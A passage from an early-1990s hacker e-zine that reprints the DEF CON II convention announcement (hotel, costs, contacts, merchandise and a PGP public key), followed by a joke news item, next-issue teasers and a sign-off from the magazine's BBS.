(PGP), Loyd Blankenship (Steve Jackson Games), Ken Phillips (Meta Information), and Jackal (Radio) to name a few. We are still contacting various groups and individuals, and don't want to say anything until we are as sure as we can be. If you think you are interested in speaking on a self selected topic, please contact me. As the speaking list is completed there will be another announcement letting people know who is expected to talk, and on what topic. WHERE THIS THING IS: It's in Las Vegas, the town that never sleeps. Really. There are no clocks anywhere in an attempt to lull you into believing the day never ends. Talk about virtual reality, this place fits the bill with no clunky hardware. If you have a buzz you may never know the difference. It will be at the Sahara Hotel. Intel as follows: The Sahara Hotel 1.800.634.6078 Room Rates: Single/Double $55, Suite $120 (Usually $200) + 8% tax Transportation: Shuttles from the airport for cheap NOTES: Please make it clear you are registering for the DEF CON ][ convention to get the room rates. Our convention space price is based on how many people register. Register under a false name if it makes you feel better, 'cuz the more that register the better for my pocket book. No one under 21 can rent a room by themselves, so get your buddy who is 21 to rent for you and crash out. Don't let the hotel people get their hands on your baggage, or there is a mandatory $3 group baggage fee. Vegas has killer unions. COST: Cost is whatever you pay for a hotel room split however many ways, plus $15 if you preregister, or $30 at the door. This gets you a nifty 24 bit color name tag (We're gonna make it niftier this year) and your foot in the door. There are fast food places all over, and there is alcohol all over the place, the trick is to get it during a happy hour for maximum cheapness. FOR MORE INFORMATION: For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com in /pub/defcon. There are digitized pictures, digitized speeches and text files with the latest up to date info available. For email users, you can email dtangent@defcon.org for more information. For Snail Mail send to DEF CON, 2702 E. Madison Street, Seattle, WA, 99207 For Voice Mail and maybe a human, 0-700-TANGENT on an AT&T phone. A DEF CON Mailing list is maintained, and the latest announcements are mailed automatically to you. If you wish to be added to the list just send email to dtangent@defcon.org. We also maintain a chat mailing list where people can talk to one another and plan rides, talk, whatever. If you request to be on this list your email address will be shown to everyone, just so you are aware. STUFF TO SPEND YOUR MONEY ON: > Tapes of last years speakers (four 90 minute tapes) are available for $20 > DEF CON I tee-shirts (white, large only) with large color logo on the front, and on the back the Fourth Amendment, past and present. This is shirt v 1.1 with no type-o's. These are $20, and sweatshirts are $25. > Pre-Register for next year in advance for $15 and save half. > Make all checks/money orders/etc. out to DEF CON, and mail to the address above. If you have any confidential info to send, use this PGP key to encrypt: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50 IDxkdGFuZ2VudEBkZWZjb24ub3JnPg== =ko7s -----END PGP PUBLIC KEY BLOCK----- I'm sure I am forgetting a bunch of stuff that will be fixed in future announcements. This files serves as the initial announcement so you can make your plans accordingly. - The Dark Tangent _______________________________________________________________________ ----------------------------------------------------------------------- NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS Today in the news, 4 hacker types were found sifting through the garbage of a local phone company. A patrolling officer was on his normal route when he happened upon the unsuspecting youths. When questioned what they were expecting to find, they simply replied 'We were looking for food, officer'. NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS _______________________________________________________________________ ----------------------------------------------------------------------- Next Issue: DEFCON II - The Experience Encryption Part II - How to Break the code Fuck IT, We'll Have it all DAMMIT! For those interested in using Internet and/or already got themselves an account, be sure to look out for our release of the Internet Chronicles. We will be covering the basics, as well as how to set up PCUCP, and your very own FSP client. Likewise, for those not lucky enough to have their own account we will be covering how to do so, and where to start. _______________________________________________________________________ ----------------------------------------------------------------------- This Concludes the first release of Pandemonium Magazine. Thanks to all who helped support the magazine and be sure to notify me at the following number if you wish to help contribute to our cause. Likewise give it a call if you wish to share your views with your fellow hobbyist. Paradigm [Spectre Coordinator] The AfterMath - Spectre/Pandemonium Mag WHQ - [206]230-0424 - [206]230-0490 _______________________________________________________________________ -----------------------------------------------------------------------